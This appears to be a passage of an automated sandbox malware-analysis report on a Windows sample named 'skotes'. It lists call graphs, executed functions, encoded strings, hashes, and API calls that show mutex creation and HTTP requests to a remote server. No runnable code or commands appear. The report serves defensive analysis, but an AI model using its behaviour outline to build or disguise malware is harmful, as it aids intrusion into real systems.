__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35859->35860 35875 40a418 GetFileAttributesA 35877 40a428 Concurrency::details::ResourceManager::Release 35875->35877 35876 40a93f 35878 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35876->35878 35877->35876 35879 40a4f3 Concurrency::details::ResourceManager::Release 35877->35879 35880 40a944 35878->35880 35881 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35879->35881 35882 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35880->35882 35883 40a903 35881->35883 35884 40a949 35882->35884 35885 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35884->35885 35886 40a94e 35885->35886 35887 40a953 Sleep CreateMutexA 35886->35887 35888 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35886->35888 35891 40a98e 35887->35891 35888->35887 35890 40a9a7 35891->35890 35894 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35891->35894 35893 40a9b0 35894->35893 35895 40a079 GetFileAttributesA 35896 40a089 Concurrency::details::ResourceManager::Release 35895->35896 35897 40a154 Concurrency::details::ResourceManager::Release 35896->35897 35898 40a930 35896->35898 35901 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35897->35901 35899 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35898->35899 35900 40a953 Sleep CreateMutexA 35899->35900 35905 40a98e 35900->35905 35903 40a903 35901->35903 35904 40a9a7 35905->35904 35908 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35905->35908 35907 40a9b0 35908->35907 35909 436dda 35910 436df6 35909->35910 35911 436de8 35909->35911 35913 43698d __wsopen_s 3 API calls 35910->35913 35912 436e4c 9 API calls 35911->35912 35914 436df2 35912->35914 35915 436e10 35913->35915 35916 4368ed __wsopen_s 2 API calls 35915->35916 35917 436e1d 35916->35917 35918 436e24 35917->35918 35922 436e4c 35917->35922 35921 436e46 35918->35921 35945 43adf5 RtlAllocateHeap __dosmaperr 35918->35945 35923 436e77 ListArray 35922->35923 35924 436e5a 35922->35924 35927 436eb9 CreateFileW 35923->35927 35928 436e9d 35923->35928 35967 4375e3 RtlAllocateHeap __dosmaperr 35924->35967 35926 436e5f 35929 4375f6 __dosmaperr RtlAllocateHeap 35926->35929 35931 436eeb 35927->35931 35932 436edd 35927->35932 35969 4375e3 RtlAllocateHeap __dosmaperr 35928->35969 35933 436e67 35929->35933 35971 436f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 35931->35971 35946 436fb4 GetFileType 35932->35946 35968 436c5a RtlAllocateHeap ___std_exception_copy 35933->35968 35935 436ea2 35940 4375f6 __dosmaperr RtlAllocateHeap 35935->35940 35938 436e72 35938->35918 35939 436ee6 ListArray 35943 436eb4 35939->35943 35944 436f1c CloseHandle 35939->35944 35941 436ea9 35940->35941 35970 436c5a RtlAllocateHeap ___std_exception_copy 35941->35970 35943->35918 35944->35943 35945->35921 35947 4370a1 35946->35947 35948 436fef 35946->35948 35952 4370af 35947->35952 35953 4370be 35947->35953 35956 437098 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 35947->35956 35949 437009 ListArray 35948->35949 35986 43732a RtlAllocateHeap __dosmaperr 35948->35986 35951 437028 GetFileInformationByHandle 35949->35951 35949->35956 35951->35953 35954 43703e 35951->35954 35955 4375f6 __dosmaperr RtlAllocateHeap 35952->35955 35988 4375c0 RtlAllocateHeap __dosmaperr 35953->35988 35972 43727c 35954->35972 35955->35956 35956->35939 35961 43705b 35962 437124 SystemTimeToTzSpecificLocalTime 35961->35962 35963 43706e 35962->35963 35964 437124 SystemTimeToTzSpecificLocalTime 35963->35964 35965 437085 35964->35965 35987 437249 RtlAllocateHeap __dosmaperr 35965->35987 35967->35926 35968->35938 35969->35935 35970->35943 35971->35939 35974 437292 _wcsrchr 35972->35974 35973 43704a 35982 437124 35973->35982 35974->35973 35989 43bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35974->35989 35976 4372d6 35976->35973 35990 43bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35976->35990 35978 4372e7 35978->35973 35991 43bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35978->35991 35980 4372f8 35980->35973 35992 43bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 35980->35992 35983 43713c 35982->35983 35984 43715c SystemTimeToTzSpecificLocalTime 35983->35984 35985 437142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 35983->35985 35984->35985 35985->35961 35986->35949 35987->35956 35988->35956 35989->35976 35990->35978 35991->35980 35992->35973

                                                                                                                                              Executed Functions

                                                                                                                                              Function 0040E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 998COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 188 40e530-40e843 call 417a00 call 405c10 call 417a00 call 405c10 call 419280 call 418320 call 418220 call 418320 call 417a00 * 3 call 40be30 call 417a00 * 2 call 405c10 call 408580 226 40ea1a-40ea62 188->226 227 40e8ce-40e9ec 188->227 226->227 230 40ea8f-40ea96 call 41d663 226->230 236 40e9f2-40e9fe 227->236 237 40ea99-40eab2 call 41cff1 227->237 230->237 236->230 238 40ea04-40ea12 236->238 238->226 240 40eab8-40eda3 call 436c6a * 2 call 417a00 call 405c10 call 4183c0 call 418220 GetFileAttributesA call 417a00 call 405c10 call 4183c0 call 418220 GetFileAttributesA 238->240 271 40eda9-40ee79 240->271 276 40f273-40f28b 271->276 277 40f5bb-40f66c call 4180c0 271->277 279 40f291-40f29d 276->279 280 40f6a3-40f6b6 276->280 277->276 283 40f699-40f6a0 call 41d663 277->283 282 40f2a3-40f2b1 279->282 279->283 282->277 284 40f6cb-40f962 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 call 4180c0 call 417a00 call 4180c0 * 2 282->284 283->280 320 40f964-40f970 284->320 321 40f98c-40f9a5 call 41cff1 284->321 323 40f982-40f989 call 41d663 320->323 324 40f972-40f980 320->324 323->321 324->323 326 40f9ab-40fb15 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 324->326 350 40fb17-40fb23 326->350 351 40fb3f-40fb4e 326->351 352 40fb35-40fb3c call 41d663 350->352 353 40fb25-40fb33 350->353 352->351 353->352 354 40fb4f-40fc6f call 436c6a call 417a00 call 409580 call 409230 call 418320 353->354 370 40fc70-40fc75 354->370 370->370 371 40fc77-410860 call 4180c0 call 417a00 * 2 call 40c360 call 436729 call 417a00 call 405c10 call 417a00 * 4 call 40e530 370->371 406 410862-41086e 371->406 407 41088a-4108a5 call 41cff1 371->407 408 410880-410887 call 41d663 406->408 409 410870-41087e 406->409 408->407 409->408 411 4108ce-411537 call 436c6a call 417a00 call 405c10 call 417a00 * 4 call 40e530 409->411
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1F$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                              • API String ID: 0-2926265604
                                                                                                                                              • Opcode ID: bac1dd4df0fb1573bc50b65381342e9a7e2c937a3169c0d58a0e9dfd3b1fa0c8
                                                                                                                                              • Instruction ID: 47c55a489a56fd91da712c144115dba593d28085047fb63452a4b418cb6bcc46
                                                                                                                                              • Opcode Fuzzy Hash: bac1dd4df0fb1573bc50b65381342e9a7e2c937a3169c0d58a0e9dfd3b1fa0c8
                                                                                                                                              • Instruction Fuzzy Hash: 9E82E6709042889BEF14EF68C9497CE7FB1AF46308F50859EE805273C2D7795A88CBD6
                                                                                                                                              Function 0040EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040EB51
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000), ref: 0040EC83
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040ED98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile$CreateDirectory
                                                                                                                                              • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1F$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                              • API String ID: 1875963930-1066624543
                                                                                                                                              • Opcode ID: fd78a48f2d9298efe8b2665af4bdcb7e5dfe66d0e6c56e4044bdb798a3af0ca3
                                                                                                                                              • Instruction ID: c4289d7ab0428a9c126637435df8ddf0f53f61d8460e47a0678dc4ff6c657b83
                                                                                                                                              • Opcode Fuzzy Hash: fd78a48f2d9298efe8b2665af4bdcb7e5dfe66d0e6c56e4044bdb798a3af0ca3
                                                                                                                                              • Instruction Fuzzy Hash: E4F25E71A001449BEF18DB38CD897DD7B729F82304F1481AEE409A73D6DB7D9AC48B99
                                                                                                                                              Function 0040BE30 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 313networkfilesleepCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 985 40be30-40be7c 986 40c281-40c2a6 call 4180c0 985->986 987 40be82-40be86 985->987 992 40c2d4-40c2ec 986->992 993 40c2a8-40c2b4 986->993 987->986 988 40be8c-40be90 987->988 988->986 990 40be96-40bf2a Sleep InternetOpenW InternetConnectA call 417a00 call 405c10 988->990 1020 40bf2c 990->1020 1021 40bf2e-40bf4a HttpOpenRequestA 990->1021 997 40c2f2-40c2fe 992->997 998 40c238-40c250 992->998 995 40c2b6-40c2c4 993->995 996 40c2ca-40c2d1 call 41d663 993->996 995->996 1000 40c34f-40c354 call 436c6a 995->1000 996->992 1002 40c304-40c312 997->1002 1003 40c22e-40c235 call 41d663 997->1003 1004 40c323-40c33f call 41cff1 998->1004 1005 40c256-40c262 998->1005 1002->1000 1010 40c314 1002->1010 1003->998 1011 40c268-40c276 1005->1011 1012 40c319-40c320 call 41d663 1005->1012 1010->1003 1011->1000 1018 40c27c 1011->1018 1012->1004 1018->1012 1020->1021 1022 40bf7b-40bfea call 417a00 call 405c10 call 417a00 call 405c10 1021->1022 1023 40bf4c-40bf5b 1021->1023 1037 40bfec 1022->1037 1038 40bfee-40c004 HttpSendRequestA 1022->1038 1025 40bf71-40bf78 call 41d663 1023->1025 1026 40bf5d-40bf6b 1023->1026 1025->1022 1026->1025 1037->1038 1039 40c035-40c05d 1038->1039 1040 40c006-40c015 1038->1040 1043 40c08e-40c0b5 InternetReadFile 1039->1043 1044 40c05f-40c06e 1039->1044 1041 40c017-40c025 1040->1041 1042 40c02b-40c032 call 41d663 1040->1042 1041->1042 1042->1039 1051 40c0c0-40c168 call 434250 InternetReadFile 1043->1051 1046 40c070-40c07e 1044->1046 1047 40c084-40c08b call 41d663 1044->1047 1046->1047 1047->1043 1059 40c16a-40c170 1051->1059 1059->1051
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(000005DC,EBA58D57,?,00000000), ref: 0040BEB8
                                                                                                                                              • InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC8
                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEC
                                                                                                                                              • HttpOpenRequestA.WININET(?,00000000), ref: 0040BF36
                                                                                                                                              • HttpSendRequestA.WININET(?,00000000), ref: 0040BFF6
                                                                                                                                              • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A8
                                                                                                                                              • InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 0040C161
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C187
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C18F
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
